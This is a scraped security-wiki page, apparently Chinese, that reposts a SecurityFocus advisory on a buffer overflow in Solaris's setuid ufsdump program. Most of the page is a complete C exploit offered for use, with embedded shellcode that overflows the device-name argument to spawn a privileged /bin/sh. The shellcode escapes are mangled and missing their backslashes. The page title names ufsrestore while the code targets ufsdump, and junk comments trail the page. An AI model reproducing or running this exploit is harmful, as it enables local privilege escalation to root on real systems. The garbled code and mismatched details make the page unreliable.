source: http://www.securityfocus.com/bid/680/info
A buffer overflow vulnerability in the /usr/lib/fs/ufs/ufsdump setuid program allows local users to obtain root and tty group access. The vulnerability is the result of 'ufsdump' not being able to handle device names of a large length.
/* ufsdump.c
* Description: Overflows a buffer to give you EGID=tty.
* At least that's what id reports.
* The running shell thinks its still the user. Maybe I'm
* doing something wrong? At any
* rate, here ya go, have fun.
*
* [email protected]
* Thanks to: Jesse Schachter for the box, and
* Unknown parties for the shellcode. (probably Aleph1).
*/
#include <stdio.h>
static inline getesp() {
__asm__(" movl %esp,%eax ");
}
main(int argc, char **argv) {
int i,j,buffer,offset;
long unsigned esp;
char unsigned buf[4096];
unsigned char
shellcode[]=
"x55x8bxecx83xecx08xebx50x33xc0xb0x3bxebx16xc3"
"x33xc0x40xebx10xc3x5ex33xdbx89x5ex01xc6x46x05"
"x07x88x7ex06xebx05xe8xecxffxffxffx9axffxffxff"
"xffx0fx0fxc3x5ex33xc0x89x76x08x88x46x07x89x46"
"x0cx50x8dx46x08x50x8bx46x08x50xe8xbdxffxffxff"
"x83xc4x0cx6ax01xe8xbaxffxffxffx83xc4x04xe8xd4"
"xffxffxff/bin/sh";
buffer=895;
offset=3500;
if (argc>1)buffer=atoi(argv[1]);
if (argc>2)offset=atoi(argv[2]);
for (i=0;i<buffer;i++)
buf[i]=0x41; /* inc ecx */
j=0;
for (i=buffer;i<buffer+strlen(shellcode);i++)
buf[i]=shellcode[j++];
esp=getesp()+offset;
buf[i]=esp & 0xFF;
buf[i+1]=(esp >> 8) & 0xFF;
buf[i+2]=(esp >> 16) & 0xFF;
buf[i+3]=(esp >> 24) & 0xFF;
buf[i+4]=esp & 0xFF;
buf[i+5]=(esp >> 8) & 0xFF;
buf[i+6]=(esp >> 16) & 0xFF;
buf[i+7]=(esp >> 24) & 0xFF;
printf("Offset: 0x%xnn",esp);
execl("/usr/lib/fs/ufs/ufsdump","ufsdump","1",buf,NULL);
}
![图片[1]-Solaris ufsrestore缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png)
CVE编号
![图片[2]-Solaris ufsrestore缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png)
CNNVD-ID
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666